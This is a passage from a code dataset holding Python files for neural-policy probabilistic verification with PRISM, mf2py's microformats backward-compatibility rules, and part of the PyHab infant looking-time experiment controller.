\"/home/edoardo/ray_results/tune_PPO_bouncing_ball/PPO_BouncingBall_71684_00004_4_2021-01-18_23-48-21/checkpoint_10/checkpoint-10\"\nconfig = get_PPO_config(1234, use_gpu=0)\ntrainer = ppo.PPOTrainer(config=config)\ntrainer.restore(nn_path)\npolicy = trainer.get_policy()\nsequential_nn = convert_ray_policy_to_sequential(policy).cpu()\nlayers = []\nfor l in sequential_nn:\n layers.append(l)\nnn = torch.nn.Sequential(*layers)\nhorizon = 10\n\ngateway = JavaGateway(auto_field=True)\nmc = gateway.jvm.explicit.MDPModelChecker(None)\nanalysis_template = Experiment.box(2)\nboundaries = [6, -5, 1, 1]\nsamples = polytope.sample(2000, analysis_template, np.array(boundaries, dtype=float))\npoint_probabilities = []\nfor i, point in enumerate(samples):\n # generate prism graph\n\n frontier = [(0, point)]\n root = point\n graph = networkx.DiGraph()\n widgets = [progressbar.Variable('frontier'), \", \", progressbar.Variable('max_t'), \", \", progressbar.widgets.Timer()]\n # with progressbar.ProgressBar(widgets=widgets) as bar_main:\n while len(frontier) != 0:\n t, state = heapq.heappop(frontier)\n # bar_main.update(frontier=len(frontier), max_t=t)\n if t > horizon:\n break\n action_prob = torch.softmax(nn(torch.tensor(state, dtype=torch.float)), 0)\n for action in range(2):\n successor, cost, done, _ = BouncingBall.calculate_successor(state, action)\n graph.add_edge(tuple(state), tuple(successor), p=action_prob[action].item())\n graph.nodes[tuple(successor)][\"done\"] = done\n if not done:\n heapq.heappush(frontier, (t + 1, tuple(successor)))\n else:\n print(\"Terminal state found\")\n gateway = JavaGateway(auto_field=True, python_proxy_port=25334)\n mdp = gateway.entry_point.reset_mdp()\n gateway.entry_point.add_states(graph.number_of_nodes())\n mapping = dict(zip(graph.nodes(), range(graph.number_of_nodes())))\n # with StandardProgressBar(prefix=\"Updating Prism \", max_value=graph.number_of_nodes()).start() as bar:\n for parent_id, successors in graph.adjacency(): # generate the edges\n if len(successors.items()) != 0: # filter out non-reachable states\n distribution = gateway.newDistribution()\n for successor_id, eattr in successors.items():\n p = eattr.get(\"p\")\n distribution.add(int(mapping[successor_id]), p)\n mdp.addActionLabelledChoice(int(mapping[parent_id]), distribution, 0)\n else:\n # zero successors\n pass\n # bar.update(bar.value + 1) # else: # print(f\"Non descending item found\") # to_remove.append(parent_id) # pass\n print(f\"Point {i} done\")\n terminal = []\n for node, attr in graph.nodes.items():\n if attr.get(\"done\"):\n terminal.append(node)\n terminal_states = [mapping[x] for x in terminal]\n if len(terminal_states) != 0:\n # terminal_states_java = ListConverter().convert(terminal_states, gateway._gateway_client)\n mdpsimple = gateway.entry_point.getMdpSimple()\n mdpsimple.findDeadlocks(True)\n mc = gateway.jvm.explicit.MDPModelChecker(None)\n if (mc.getSettings() is None):\n mc.setSettings(gateway.jvm.prism.PrismSettings())\n target = gateway.jvm.java.util.BitSet()\n for id in terminal_states:\n target.set(id)\n res1 = mc.computeReachProbs(mdpsimple, target, False)\n sol1 = res1.soln\n maxprob = list(sol1)[0]\n res2 = mc.computeReachProbs(mdpsimple, target, True)\n sol2 = res2.soln\n minprob = list(sol2)[0]\n else:\n maxprob = 0\n minprob = 0\n point_probabilities.append((minprob, maxprob))\ntemplate_2d: np.ndarray = np.array([[0, 1], [1, 0]])\n# show_polygons(analysis_template, samples, template_2d, [x[0] for x in point_probabilities])\nplot_points_and_prediction(samples @ template_2d.T, np.array([x[0] for x in point_probabilities]))\n","sub_path":"runnables/verification_runs/run_bouncing_ball_sampleprob.py","file_name":"run_bouncing_ball_sampleprob.py","file_ext":"py","file_size_in_byte":4545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"320860388","text":"# coding: utf-8\n\"\"\"Looks for classic microformats class names and augments them with\nmicroformats2 names. Ported and adapted from php-mf2.\n\"\"\"\n\nfrom __future__ import unicode_literals, print_function\nfrom .dom_helpers import get_descendents\nfrom . import mf2_classes\nimport bs4\nimport copy\nimport os\nimport codecs\nimport json\n\nimport sys\nif sys.version < '3':\n from urllib import unquote\nelse:\n from urllib.parse import unquote\n\n# Classic Root Classname map\nCLASSIC_ROOT_MAP = {}\n\n# Classic Root properties map\nCLASSIC_PROPERTY_MAP = {}\n\n# populate backcompat rules from JSON files\n\n_RULES_LOC = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'backcompat-rules')\n\nfor filename in os.listdir(_RULES_LOC):\n file_path = os.path.join(_RULES_LOC, filename)\n root = os.path.splitext(filename)[0]\n with codecs.open(file_path, 'r', 'utf-8') as f:\n rules = json.load(f)\n\n CLASSIC_ROOT_MAP[root] = rules['type'][0]\n CLASSIC_PROPERTY_MAP[root] = rules['properties']\n\n\n\ndef root(classes):\n \"\"\"get all backcompat root classnames\n \"\"\"\n return [c for c in classes if c in CLASSIC_ROOT_MAP]\n\n\ndef make_classes_rule(old_class, new_classes):\n \"\"\"Builds a rule for augmenting an mf1 class with its mf2\n equivalent(s).\n \"\"\"\n def f(child, **kwargs):\n child_classes = child.get('class', [])\n if old_class in child_classes:\n child_classes += [c for c in new_classes\n if c not in child_classes]\n child['class'] = child_classes\n return f\n\n\n# The RULES map has a list of rules for each root class type.\n# We'll build the vast majority of it from the CLASSIC_PROPERTY_MAP\nRULES = dict(\n (old_root, [make_classes_rule(old_class, new_classes)\n for old_class, new_classes in properties.items()])\n for old_root, properties in CLASSIC_PROPERTY_MAP.items())\n\n\ndef rel_bookmark_to_url_rule(child, **kwargs):\n \"\"\"rel=bookmark gets augmented with class=\"u-url\n \"\"\"\n child_classes = child.get('class', [])\n if ('bookmark' in child.get('rel', [])\n and 'u-url' not in child_classes):\n child_classes.append('u-url')\n child['class'] = child_classes\n\n\ndef rel_tag_to_category_rule(child, **kwargs):\n \"\"\"rel=tag converts to p-category using a special transformation (the\n category becomes the tag href's last path segment). This rule adds a new\n data tag so that\n gets augmented with\n \n \"\"\"\n rels = child.get('rel', [])\n classes = child.get('class', [])\n if ('tag' in rels and child.get('href')\n and 'p-category' not in classes\n and 'u-category' not in classes):\n segments = [seg for seg in child.get('href').split('/') if seg]\n if segments:\n data = bs4.BeautifulSoup('').data\n # use mf1 class here so it doesn't get removed later\n data['class'] = ['category']\n data['value'] = unquote(segments[-1])\n child.parent.append(data)\n\n\n# Augment with special rules\nRULES['hentry'] += [\n rel_bookmark_to_url_rule,\n rel_tag_to_category_rule,\n]\n\ndef apply_rules(el):\n \"\"\"add modern classnames for older mf1 classnames\n\n returns a copy of el and does not modify the original\n \"\"\"\n\n el_copy = copy.copy(el)\n\n def apply_prop_rules_to_children(parent, rules):\n\n for child in (c for c in parent.children if isinstance(c, bs4.Tag)):\n classes = child.get('class',[])\n # find existing mf2 properties if any and delete them\n mf2_props = mf2_classes.property_classes(classes)\n child['class'] = [cl for cl in classes if cl not in mf2_props]\n\n # apply rules to change mf1 to mf2\n for rule in rules:\n rule(child)\n\n # recurse if it's not a nested mf1 or mf2 root\n if not (mf2_classes.root(classes) or root(classes)):\n apply_prop_rules_to_children(child, rules)\n\n\n # add mf2 root equivalent\n classes = el_copy.get('class', [])\n old_roots = root(classes)\n for old_root in old_roots:\n new_root = CLASSIC_ROOT_MAP[old_root]\n if new_root not in classes:\n el_copy['class'].append(new_root)\n\n\n # add mf2 prop equivalent to descendents and remove existing mf2 props\n rules = []\n for old_root in old_roots:\n rules.extend(RULES.get(old_root,[]))\n\n apply_prop_rules_to_children(el_copy, rules)\n\n return el_copy\n","sub_path":"mf2py/backcompat.py","file_name":"backcompat.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"308068932","text":"import os, sys\nfrom psychopy import gui, visual, event, core, data, monitors, tools, prefs, logging\nfrom psychopy.constants import (STARTED, PLAYING) # Added for new stimulus types\nprefs.hardware['audioLib'] = ['sounddevice']\nif os.name is 'posix':\n prefs.general['audioDevice'] = ['Built-in Output']\nfrom psychopy import sound\nimport pyglet\nfrom pyglet import input as pyglet_input\nimport wx, random, csv\nfrom math import *\nfrom datetime import *\nfrom dateutil.relativedelta import *\nfrom copy import deepcopy # needed for exactly one usage in redotrial because it's the only reasonable way.\n\n# VM ADDED\nimport psychopy_tobii_infant as pti\nimport numpy as np\n\n\n# NOTE - VM REPLACED ALL INSTANCES OF \"self.keyboard[self.key.B]\" with \"self.lookingLeap()\"\n\n\nclass PyHab:\n \"\"\"\n\n PyHab looking time coding + stimulus control system\n\n Jonathan Kominsky, 2016-2018\n\n Keyboard coding: A = ready, B = coder 1 on, L = coder 2 on, R = abort trial, Y = end experiment (for fussouts)\n\n Between-trials: R = redo previous trial, J = jump to test trial, I = insert additional habituation trial (hab only)\n\n Throughout this script, win2 is the coder display, win is the stimulus presentation window.\n dataMatrix is the primary data storage for the summary data file. It is a list of dicts, each\n dict corresponds to a trial.\n\n Anything called \"verbose\" is part of the verbose data file. There are up to four such structures:\n On (for gaze-on events)\n Off (for gaze-off events)\n On2 and Off2 (for the optional secondary coder)\n Each coder's on and off are recorded in a separate dict with trial, gaze on/off, start, end, and duration.\n\n \"\"\"\n\n def __init__(self, settingsDict):\n \"\"\"\n Read all settings from settings file\n\n :param settingsDict: a dict built from a csv by the launcher script and passed to the class\n :type settingsDict: dict\n \"\"\"\n if os.name is 'posix': # glorious simplicity of unix filesystem\n self.dirMarker = '/'\n otherOS = '\\\\'\n elif os.name is 'nt': # Nonsensical Windows-based contrarianism\n self.dirMarker = '\\\\'\n otherOS = '/'\n self.dataColumns = eval(settingsDict['dataColumns'])\n self.prefix = settingsDict['prefix'] # prefix for data files. All data filenames will start with this text.\n self.dataFolder = settingsDict['dataloc'] # datafolder, condpath,stimPath are the ones that need modification.\n if len(self.dataFolder) > 0 and self.dataFolder[-1] is not self.dirMarker:\n self.dataFolder = [self.dirMarker if x == otherOS else x for x in self.dataFolder]\n self.dataFolder = ''.join(self.dataFolder)\n # Create verbose data sub-folder. New in 0.8.\n self.verboseFolder = self.dataFolder + 'verbose' + self.dirMarker\n if not os.path.isdir(self.verboseFolder):\n os.makedirs(self.verboseFolder)\n\n\n # UNIVERSAL SETTINGS\n self.maxDur = eval(settingsDict['maxDur']) # maximum number of seconds in a trial - can be a constant or a dictionary with different times for EACH trial type (must include every type). {'A':20,'B':60} etc.\n self.playThrough = eval(settingsDict['playThrough']) # A dict which informs what kind of gaze-contingency each trial type follows.\n self.movieEnd = eval(settingsDict['movieEnd']) # A list of trial types that only end (in stim pres mode) on the end of the movie file associated with them.\n self.maxOff = eval(settingsDict['maxOff']) # maximum number of consecutive seconds of offtime to end trial - by trial type\n self.minOn = eval(settingsDict['minOn']) # minimum on-time for a trial (seconds) - by trial type\n self.blindPres = eval(settingsDict['blindPres']) # 0, 1, or 2. 0 = show everything. 1 = show trial number + status squares. 2 = no trial #, status squares do not indicate on/off\n self.autoAdvance = eval(settingsDict['autoAdvance']) # For creating studies where you don't want a lag between trials, just automatic advancement to the next.\n self.randPres = eval(settingsDict['randPres']) # controls whether the program will look for an external randomization file to determine presentation order\n # If not, hab will present the first thing in each of the lists above, and VoE will just go through the lists in order\n self.condPath = settingsDict['condPath'] # path for the condition file.\n self.condFile = settingsDict['condFile'] # if you have a condition file, put filename here (WITH EXTENSION). Must be .csv\n self.condList = eval(settingsDict['condList']) # list of conditions for the dropdown menu, if using random presentation.[SOON: GET AUTOMATICALLY FROM FILE]\n if len(self.condPath) > 0 and self.condPath[-1] is not self.dirMarker:\n self.condPath = [self.dirMarker if x == otherOS else x for x in self.condPath]\n self.condPath = ''.join(self.condPath)\n\n\n # ORDER OF PRESENTATION\n # NOTE: a SINGLE instance of 'Hab' will insert a contiguous habituation BLOCK of up to maxHabTrials.\n # Recommend you make sure repetitions of each trial type is a multiple of the list length, if you want even presentation\n self.trialOrder = eval(settingsDict['trialOrder'])\n\n # HABITUATION DESIGN SETTINGS\n self.maxHabTrials = eval(settingsDict['maxHabTrials']) # number of habituation trials in a HAB design\n self.setCritWindow = eval(settingsDict['setCritWindow']) # Number of trials to use when setting the habituation window, e.g., 3 = first three hab trials\n self.setCritDivisor = eval(settingsDict['setCritDivisor']) # Divide sum of looking time over first setHabWindow trials by this value. for average, set equal to setHabWindow. For sum, set to 1.\n self.setCritType = settingsDict['setCritType'] # Criterion set by dynamic window or first set of trials\n self.metCritWindow = eval(settingsDict['metCritWindow']) # size of moving window of trials to sum looking times and compare to habituation criterion.\n self.metCritDivisor = eval(settingsDict['metCritDivisor']) # If you want to compare, e.g., average rather than sum of looking times of last metCritWindow trials, change this accordingly.\n self.metCritStatic = settingsDict['metCritStatic'] # Criterion evaluated over moving or static windows\n self.habTrialList = eval(settingsDict['habTrialList']) # A new \"meta-hab\" trial type consisting of several sub-trial-types.\n if 'calcHabOver' in settingsDict.keys():\n self.calcHabOver = eval(settingsDict['calcHabOver'])\n else:\n if len(self.habTrialList) > 0:\n if 'Hab' in self.habTrialList:\n self.calcHabOver = ['Hab'] # Mimics old behavior\n else:\n self.calcHabOver = [self.habTrialList[-1]]\n else:\n self.calcHabOver = []\n if 'blockList' in settingsDict.keys():\n self.blockList = eval(settingsDict['blockList'])\n self.blockDataList = eval(settingsDict['blockDataList'])\n else:\n self.blockList = {}\n self.blockDataList = []\n\n\n # STIMULUS PRESENTATION SETTINGS\n self.stimPres = eval(settingsDict['stimPres']) # For determining if the program is for stimulus presentation (True) or if it's just coding looking times (False)\n if not self.stimPres:\n self.movieEnd = [] # So we don't run into trouble with trials not ending waiting for movies that don't exist.\n self.stimPath = settingsDict['stimPath'] # Folder where movie files can be located (if not in same folder as script)\n self.stimNames = eval(settingsDict['stimNames']) # A dict of trial types with associated lists of stimuli\n self.stimList = eval(settingsDict['stimList']) # List of all stimuli in the experiment.\n # Go through each item in stimlist, find its stimloc parameter, and replace \\\\ with / or vise-versa\n for [i,j] in self.stimList.items():\n try:\n j['stimLoc'] = ''.join([self.dirMarker if x == otherOS else x for x in j['stimLoc']])\n except KeyError: # For image/audio pairs\n j['audioLoc'] = ''.join([self.dirMarker if x == otherOS else x for x in j['audioLoc']])\n j['imageLoc'] = ''.join([self.dirMarker if x == otherOS else x for x in j['imageLoc']])\n\n self.screenWidth = eval(settingsDict['screenWidth']) # Display window width, in pixels\n self.screenHeight = eval(settingsDict['screenHeight']) # Display window height, in pixels\n self.screenColor = settingsDict['screenColor'] #Background color of stim window.\n self.movieWidth = eval(settingsDict['movieWidth']) # movie width\n self.movieHeight = eval(settingsDict['movieHeight']) # movie height\n self.screenIndex = eval(settingsDict['screenIndex']) # which monitor stimuli are presented on. 1 for secondary monitor, 0 for primary monitor.\n self.ISI = eval(settingsDict['ISI']) # time between loops (by trial type)\n # Backwards compatibility time!\n if type(self.ISI) is not dict:\n # Go through stimNames and make everything work\n tempISI = {}\n for [i,j] in self.stimNames.items():\n tempISI[i] = self.ISI\n self.ISI = tempISI\n try:\n self.expScreenIndex = eval(settingsDict['expScreenIndex'])\n except:\n if self.screenIndex == 1:\n self.expScreenIndex = 0\n else:\n self.expScreenIndex = 1\n\n # Secondary evals to make sure everything in the dictionaries that needs to be a number is one.\n # maxDur, maxOff, minOn, ISI\n for q in [self.maxDur, self.maxOff, self.minOn, self.ISI]:\n for [i,j] in q.items():\n if isinstance(j, str):\n try:\n q[i] = eval(j)\n except:\n errDlg = gui.Dlg(title=\"Settings error\")\n errDlg.addText(\"A setting for trial type \" + i + \" contains text where number expected. Please update settings in builder!\")\n errDlg.show()\n core.quit()\n\n self.freezeFrame = eval(settingsDict['freezeFrame']) # time that movie remains on first frame at start of trial.\n self.playAttnGetter = eval(settingsDict['playAttnGetter']) # Trial-by-trial marker of which attngetter goes with which trial (if applicable).\n self.attnGetterList = eval(settingsDict['attnGetterList']) # List of all attention-getters\n # Go through each item in attnGetterList, find its stimloc parameter, and replace \\\\ with / or vise-versa\n for [i,j] in self.attnGetterList.items():\n j['stimLoc'] = ''.join([self.dirMarker if x == otherOS else x for x in j['stimLoc']])\n try: # To allow for better backwards compatibility, won't crash if this was made in a version that has no startImage or endImage lines\n self.startImage = settingsDict['startImage']\n self.endImage = settingsDict['endImage']\n self.nextFlash = eval(settingsDict['nextFlash']) # 0 or 1, whether to flash when A is required for next trial.\n except:\n self.startImage = ''\n self.endImage = ''\n self.nextFlash = 0\n try:\n self.habThresh = eval(settingsDict['habThresh'])\n except:\n self.habThresh = 1.0\n\n if len(self.stimPath) > 0 and self.stimPath[-1] is not self.dirMarker: # If it was made in one OS and running in another\n self.stimPath = [self.dirMarker if x == otherOS else x for x in self.stimPath]\n self.stimPath = ''.join(self.stimPath)\n\n '''\n END SETTINGS\n '''\n self.habCount = 0 # For hab designs, checks the # of habituation trials completed\n self.habCrit = 0 # initial setting of habcrit at 0\n self.habSetWhen = -1\n self.habMetWhen = -1 # Ported from MB4: Tracks both when the habituation criterion is set, and met.\n self.maxHabIndex = 0\n self.habDataCompiled=[0]*self.maxHabTrials # A new easy way to track just hab trials, even with complex meta-trial structure.\n self.dataMatrix = [] # primary data array\n self.blockDataTags = {}\n for i in self.blockDataList:\n self.blockDataTags[i] = [] # Set up for run to build this list.\n # data format: snum, sID, age in months, age in days, sex, condition, trial, GNGtrial, trial type, hab crit, on-time, number of gazes, off-time, number of look-offs\n # then same again at the end for b-coder?\n self.badTrials = [] # data array for bad trials\n self.verboseOn = [] # \"verbose\" data aray for gazes on, that includes each individual gaze, when it happened, etc.\n self.verboseOff = [] # same for off-time\n self.verboseOn2 = [] # for coder B. Can't assume that they will line up in terms of number of gazes so can't put them in same file.\n self.verboseOff2 = [] # for coder B.\n self.badVerboseOn = [] # same as above but for bad trials\n self.badVerboseOff = [] # same as above but for bad trials\n self.badVerboseOn2 = [] # as above for coder B\n self.badVerboseOff2 = [] # as above for coder B\n if not self.stimPres:\n self.endTrialSound = sound.Sound('A', octave=4, sampleRate=44100, secs=0.2)\n self.endHabSound = sound.Sound('G', octave=4, sampleRate=44100, secs=0.2)\n if type(self.maxDur) is int: # Secretly MaxDur will always be a dict, but if it's a constant we just create the dict here\n tempDur = self.maxDur\n self.maxDur = {} # create a dict\n # look up unique names in trialOrder to get all the trial types\n for x in self.trialOrder:\n self.maxDur[x] = tempDur # Python: Yes, it really is that easy.\n self.statusOffset = 0\n self.statusOffsetY = 0\n self.testOffset = 0\n self.frameCount = 0 # the frame counter for the movement of A and B, based on the refresh rate.\n self.pauseCount = 0 # used for ISI calculations\n self.stimName = '' # used for adding the name of the stimulus file to the output.\n self.key = pyglet.window.key # This initiates the keyhandler. Here so we can then set the relevant keys.\n self.secondKey = self.key.L\n self.verbDatList = {'verboseOn':[], 'verboseOff':[], 'verboseOn2':[], 'verboseOff2':[]} # a dict of the verbose data arrays\n self.verbBadList = {'verboseOn':[], 'verboseOff':[], 'verboseOn2':[], 'verboseOff2':[]} # Corresponding for bad data\n\n '''\n FUNCTIONS\n '''\n\n def abortTrial(self, onArray, offArray, trial, ttype, onArray2, offArray2, stimName = '', habTrialNo = 0): # the 2nd arrays are if there are two coders.\n \"\"\"\n Only happens when the 'abort' button is pressed during a trial. Creates a \"bad trial\" entry\n out of any data recorded for the trial so far, to be saved later.\n\n :param onArray: Gaze-on events for coder 1\n :type onArray: list of dicts {trial, trialType, startTime, endTime, duration}\n :param offArray: Gaze-off events for coder 1\n :type offArray: list of dicts {trial, trialType, startTime, endTime, duration}\n :param trial: trial number\n :type trial: int\n :param ttype: trial type\n :type ttype: string\n :param onArray2: Gaze-on events for (optional) coder 2\n :type onArray2: list of dicts\n :param offArray2: Gaze-off events for (optional) coder 2\n :type offArray2: list of dicts\n :param stimName: If presenting stimuli, name of the stim file\n :type stimName: string\n :return:\n :rtype:\n \"\"\"\n\n sumOn = 0\n sumOff = 0\n if habTrialNo <= 0:\n habTrialNo = ''\n for i in range(0, len(onArray)):\n sumOn = sumOn + onArray[i]['duration']\n for j in range(0, len(offArray)):\n sumOff = sumOff + offArray[j]['duration']\n # needs to be .extend or you get weird array-within-array-within-array issues that become problematic later\n self.verbBadList['verboseOn'].extend(onArray)\n self.verbBadList['verboseOff'].extend(offArray)\n sumOn2 = 0\n sumOff2 = 0\n if len(onArray2) > 0 or len(offArray2) > 0:\n for i in range(0, len(onArray2)):\n sumOn2 = sumOn2 + onArray2[i]['duration']\n for j in range(0, len(offArray2)):\n sumOff2 = sumOff2 + offArray2[j]['duration']\n self.verbBadList['verboseOn2'].extend(onArray2)\n self.verbBadList['verboseOff2'].extend(offArray2)\n tempData = {'sNum': self.sNum, 'sID':self.sID, 'months': self.ageMo, 'days': self.ageDay, 'sex': self.sex, 'cond': self.cond,\n 'condLabel': self.condLabel,'trial': trial, 'GNG': 0, 'trialType': ttype, 'stimName': stimName,\n 'habCrit': self.habCrit, 'habTrialNo': habTrialNo, 'sumOnA': sumOn, 'numOnA': len(onArray), 'sumOffA': sumOff,\n 'numOffA': len(offArray), 'sumOnB': sumOn2, 'numOnB': len(onArray2), 'sumOffB': sumOff2,\n 'numOffB': len(offArray2)}\n self.badTrials.append(tempData)\n\n def dataRec(self, onArray, offArray, trial, type, onArray2, offArray2, stimName = '', habTrialNo = 0):\n \"\"\"\n Records the data for a trial that ended normally.\n\n :param onArray: Gaze-on events for coder 1\n :type onArray: list of dicts {trial, trialType, startTime, endTime, duration}\n :param offArray: Gaze-off events for coder 1\n :type offArray: list of dicts {trial, trialType, startTime, endTime, duration}\n :param trial: trial number\n :type trial: int\n :param type: trial type\n :type type: string\n :param onArray2: Gaze-on events for (optional) coder 2\n :type onArray2: list\n :param offArray2: Gaze-off events for (optional) coder 2\n :type offArray2: list\n :param stimName: If presenting stimuli, name of the stim file\n :type stimName: string\n :param habTrialNo: If part of a hab block, what hab trial it was part of.\n :type habTrialNo: int\n :return:\n :rtype:\n \"\"\"\n sumOn = 0\n sumOff = 0\n if habTrialNo <= 0:\n habTrialNo = ''\n # loop through each array adding up gaze duration (on and off).\n for i in range(0, len(onArray)):\n sumOn = sumOn + onArray[i]['duration']\n for j in range(0, len(offArray)):\n sumOff = sumOff + offArray[j]['duration']\n sumOn2 = 0\n sumOff2 = 0\n if len(offArray2) > 0 or len(onArray2) > 0:\n for i in range(0, len(onArray2)):\n sumOn2 = sumOn2 + onArray2[i]['duration']\n for j in range(0, len(offArray2)):\n sumOff2 = sumOff2 + offArray2[j]['duration']\n self.verbDatList['verboseOn2'].extend(onArray2)\n self.verbDatList['verboseOff2'].extend(offArray2)\n # add to verbose master gaze array\n self.verbDatList['verboseOn'].extend(onArray)\n self.verbDatList['verboseOff'].extend(offArray)\n tempData = {'sNum': self.sNum, 'sID': self.sID, 'months': self.ageMo, 'days': self.ageDay, 'sex': self.sex, 'cond': self.cond,\n 'condLabel': self.condLabel, 'trial': trial, 'GNG': 1, 'trialType': type, 'stimName': stimName,\n 'habCrit': self.habCrit, 'habTrialNo': habTrialNo, 'sumOnA': sumOn, 'numOnA': len(onArray), 'sumOffA': sumOff,\n 'numOffA': len(offArray), 'sumOnB': sumOn2, 'numOnB': len(onArray2), 'sumOffB': sumOff2,\n 'numOffB': len(offArray2)}\n self.dataMatrix.append(tempData)\n\n def redoTrial(self, trialNum):\n \"\"\"\n Allows you to redo a trial after it has ended. Similar to abort trial, but under\n the assumption that the data has already been recorded and needs to be replaced.\n Decrementing of trial numbers is handled in doExperiment when the relevant key is\n pressed.\n\n :param trialNum: Trial number to redo\n :type trialNum: int\n :return:\n :rtype:\n \"\"\"\n\n newTempData = {}\n i = 0\n while i < len(self.dataMatrix):\n if self.dataMatrix[i]['trial'] == trialNum and self.dataMatrix[i]['GNG'] == 1:\n trialIndex = i\n newTempData = self.dataMatrix[i]\n break\n else:\n i += 1\n # add the new 'bad' trial to badTrials\n newTempData['GNG'] = 0\n if self.dataMatrix[trialIndex]['trialType'][0:4] == 'hab.': # Redoing a habituation trial\n tempName = deepcopy(self.dataMatrix[trialIndex]['trialType'])\n tempName = tempName[4:] # Just removing 'hab.'\n # Subtract data from self.habDataCompiled before checking whether we reduce the hab count, do make indexing\n # the correct part of habDataCompiled easier. Notably, reduces but does not inherently zero out.\n if tempName in self.calcHabOver: # Make sure it's part of the hab calc\n self.habDataCompiled[self.habCount-1] = self.habDataCompiled[self.habCount-1] - self.dataMatrix[trialIndex]['sumOnA']\n if self.habDataCompiled[self.habCount-1] < 0: # For rounding errors\n self.habDataCompiled[self.habCount-1] = 0\n # If it's the end of the hab iteration, then reduce the hab count.\n if '^' in self.actualTrialOrder[trialNum-1]: # This is kind of a dangerous kludge that hopefully won't come up that often.\n self.habCount -= 1\n elif newTempData['trialType'] == 'Hab':\n self.habCount -= 1\n self.habDataCompiled[self.habCount] = 0 # Resets the appropriate instance of the hab data structure\n self.badTrials.append(newTempData)\n # remove it from dataMatrix\n self.dataMatrix.remove(self.dataMatrix[trialIndex])\n # basically need to read through the verbose matrices, add everything that references that trial to the 'bad'\n # verbose data matrices, and mark the relevant lines for later deletion\n for q,z in self.verbDatList.items():\n if len(z) > 0: # Avoid any blank arrays (e.g. if there is no coder 2)\n for i in range(0, len(self.verbDatList[q])):\n if self.verbDatList[q][i]['trial'] == trialNum:\n # Deepcopy needed to stop it from tying the badlist entries to the regular entries and removing them.\n self.verbBadList[q].append(deepcopy(self.verbDatList[q][i]))\n self.verbDatList[q][i]['trial'] = 99\n # Elegantly removes all tagged lines of verbose data\n self.verbDatList[q] = [vo for vo in self.verbDatList[q] if vo['trial'] != 99]\n\n\n\n def checkStop(self):\n \"\"\"\n After a hab trial, checks the habitution criteria and returns 'true' if any of them are met.\n Also responsible for setting the habituation criteria according to settings.\n Prior to any criteria being set, self.HabCrit is 0, and self.habSetWhen is -1.\n\n Uses a sort of parallel data structure that just tracks hab-relevant gaze totals. As a bonus, this means it now\n works for both single-target and preferential looking designs with no modification.\n\n :return: True if hab criteria have been met, False otherwise\n :rtype:\n \"\"\"\n\n\n\n if self.habCount == self.setCritWindow and self.setCritType != 'Threshold': # time to set the hab criterion. This will be true for both dynamic and first\n sumOnTimes = 0\n for j in range(0,self.habCount):\n sumOnTimes = sumOnTimes + self.habDataCompiled[j]\n self.habCrit = sumOnTimes / self.setCritDivisor\n self.habSetWhen = deepcopy(self.habCount)\n elif self.setCritType == 'Peak': # Checks if we need to update the hab criterion\n sumOnTimes = 0\n index = self.habCount - self.setCritWindow #How far back should we look?\n for n in range(index, self.habCount): # now, starting with that trial, go through and add up the good trial looking times\n sumOnTimes = sumOnTimes + self.habDataCompiled[n]\n sumOnTimes = sumOnTimes / self.setCritDivisor\n if sumOnTimes > self.habCrit:\n self.habCrit = sumOnTimes\n self.habSetWhen = deepcopy(self.habCount)\n elif self.setCritType == 'Max' and self.habCount > self.setCritWindow: # Absolute max looking time among hab trials, regardless of order.\n sumOnTimes = 0\n habOns = deepcopy(self.habDataCompiled)\n habOns.sort() # Rearranges the array into lowest-highest.\n lastHabUsed = 0\n for i in range(-1*self.setCritWindow,0):\n sumOnTimes = sumOnTimes + habOns[i]\n # This convoluted mess finds the last instance of the 'max' value(s) used in the computation.\n lastHabUsed = max(lastHabUsed,len(self.habDataCompiled) - self.habDataCompiled[::-1].index(habOns[i]))\n sumOnTimes = sumOnTimes / self.setCritDivisor\n if sumOnTimes > self.habCrit:\n self.habCrit = sumOnTimes\n self.habSetWhen = lastHabUsed\n elif self.setCritType == 'Threshold' and self.habCount >= self.setCritWindow and self.habSetWhen == -1:\n sumOnTimes = 0\n index = self.habCount - self.setCritWindow # How far back should we look?\n for j in range(index,self.habCount):\n sumOnTimes = sumOnTimes + self.habDataCompiled[j]\n if sumOnTimes > self.habThresh:\n self.habCrit = sumOnTimes / self.setCritDivisor\n self.habSetWhen = deepcopy(self.habCount)\n\n # Now we separate out the set and met business.\n if self.habCount == self.maxHabTrials:\n # end habituation and goto test\n if not self.stimPres:\n for i in [0, 1, 2]:\n core.wait(.25) # an inadvertent side effect of playing the sound is a short pause before the test trial can begin\n self.endHabSound.play()\n self.habMetWhen = self.habCount\n return True\n elif self.habCount >= self.setCritWindow + self.metCritWindow and self.habSetWhen > -1: # if we're far enough in that we can plausibly meet the hab criterion\n # Problem: Fixed window, peak, and max as relates to habsetwhen....\n # Fixed window is probably the only thing that should ignore habsetwhen.\n if self.habCount < self.habSetWhen + self.metCritWindow and self.metCritStatic == 'Moving': # Was the hab set \"late\" and are we too early as a result\n return False\n else:\n sumOnTimes = 0\n index = self.habCount - self.metCritWindow\n if (self.metCritStatic == 'Moving') or (self.habCount-self.setCritWindow) % self.metCritWindow == 0:\n for n in range(index, self.habCount): # now, starting with that trial, go through and add up the good trial looking times\n sumOnTimes = sumOnTimes + self.habDataCompiled[n]\n sumOnTimes = sumOnTimes / self.metCritDivisor\n if sumOnTimes < self.habCrit:\n # end habituation and go to test\n if not self.stimPres:\n for i in [0, 1, 2]:\n core.wait(.25) # TODO: an inadvertent side effect of playing the sound is a short pause before the test trial can begin\n self.endHabSound.play()\n self.habMetWhen = self.habCount\n return True\n else:\n return False\n else:\n return False\n else:\n return False\n\n\n def attnGetter(self, trialType):\n \"\"\"\n Plays either a default attention-getter animation or a user-defined one.\n Separate settings for audio w/shape and video file attention-getters.\n\n :return:\n :rtype:\n \"\"\"\n self.statusSquareA.fillColor = 'blue'\n self.statusTextA.text = \"RDY\"\n self.statusSquareB.fillColor = 'blue'\n self.statusTextB.text = \"RDY\"\n self.statusSquareA.draw()\n self.statusTextA.draw()\n self.statusSquareB.draw()\n self.statusTextB.draw()\n if self.blindPres < 2:\n self.trialText.draw()\n if self.blindPres < 1:\n self.readyText.draw()\n self.win2.flip()\n\n attnGetter = self.attnGetterList[self.playAttnGetter[trialType]] # Reads attention-getter from list of AGs.\n if attnGetter['stimType'] is 'Audio':\n if attnGetter['shape'] is 